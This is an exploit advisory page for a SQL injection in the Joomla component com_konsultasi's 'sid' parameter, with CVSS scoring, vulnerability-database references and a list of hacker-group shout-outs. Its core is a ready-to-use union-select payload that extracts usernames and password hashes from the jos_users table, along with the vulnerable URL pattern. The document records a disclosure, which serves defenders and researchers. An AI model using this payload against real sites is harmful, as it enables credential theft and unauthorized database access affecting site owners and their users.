Joomla Component com_konsultasi (sid) SQL Injection Vulnerability

2010.05.29
Credit: c4uR
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

------------------------------------------------------------------------- Joomla Component com_konsultasi (sid) SQL Injection Vulnerability ------------------------------------------------------------------------- Author : c4uR Date : May, 13, 2010 Location : Jakarta, Indonesia Time Zone : GMT +7:00 ------------------------------------------------------------------------- Esploit : ---------- -5/**/union/**/select/**/all/**/1,2,3,4,concat(username,0x3a,password)c4uR,6,7,8,9/**/from/**/jos_users-- SQLi p0c : ----------- http://127.0.0.1/[gubrak]/index.php?option=com_konsultasi&act=detail&sid=[gubrak] ------------------------------------------------------------------------- crott : ----------- [+] Malingsial sempak, crott... crott... crott... [+] tian(tangannye jgn nakal)+GheMaX(byk² makan, biar ad isinye)+xx_user+ChuCu+JaLi- [+] si m0n0n, banci kamera(1214n,v4lc0m87,astroboyyy,aldy182) [+] bocah tua nakal (mbah l4mpor,awchoy) [+] flyff666(hacker qo, rokoknye djarum super cich. brukakakakaka) [+] cruz3N(jgn maen sabun molo coy)+petimati(roko sp ajah d comot,brukakakak) [+] spykit-hendri note(kalian jgn marahan mulu ea, yg akur..) [+] v3n0m(payah ach, masa cari kost ajah blom ktmu sich, brukakakakaak) [+] koh wisdom(rokok trus)+blue screen,skutengboy(kalian pasangan yg serasi, jikakakakakk) [+] uzanc(payah ah, masa gw gg dibikinin)+jhony ramsoy(klo nikah, undang² gw ea) [+] kiddies+om whitehat+chaer+om xadpritox [+] K9+atom+legion(Good Job+you best cracker... hashkiller) [+] amel bauell, gg ad matinye... [+] Apartement Griya Semanggi + poinsonV [+] Indonesia gg ada matinye, walaupun terkadang suram ------------------------------------------------------------------------- contact : ----------- - qinoryy@yahoo.com - #devilzc0de @irc.dal.net

References:

http://xforce.iss.net/xforce/xfdb/58584
http://www.securityfocus.com/bid/40160
http://www.exploit-db.com/exploits/12590
http://secunia.com/advisories/39816
http://packetstormsecurity.org/1005-exploits/joomlakonsultasi-sql.txt
http://osvdb.org/64637


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top